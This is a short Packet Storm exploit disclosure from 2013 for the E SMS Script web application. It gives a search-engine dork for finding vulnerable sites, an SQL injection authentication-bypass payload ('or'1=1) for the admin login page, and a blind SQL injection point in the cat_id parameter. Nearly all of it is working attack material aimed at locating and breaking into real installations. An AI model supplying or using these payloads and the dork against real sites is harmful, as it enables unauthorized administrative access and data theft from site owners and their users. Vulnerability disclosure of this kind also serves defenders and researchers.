E SMS Script SQL Injection

2013-01-07T00:00:00
ID PACKETSTORM:119297
Type packetstorm
Reporter cr4wl3r
Modified 2013-01-07T00:00:00

Description

                                        
                                            `# E SMS Script Multiple SQL Injection Vulnerability  
# By cr4wl3r http://bastardlabs.info  
# http://bastardlabs.info/exploits/E_SMS_Script.txt  
# Good Music: http://goo.gl/TLkEs :)  
# Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41  
# Dork: inurl:"smscollection.php?cat_id="  
  
Proof of concept:  
  
Auth Bypass  
  
http://bastardlabs/admin/adminlogin.php  
Username: cr4wl3r  
Password: 'or'1=1  
  
Blind SQLi  
  
http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]  
`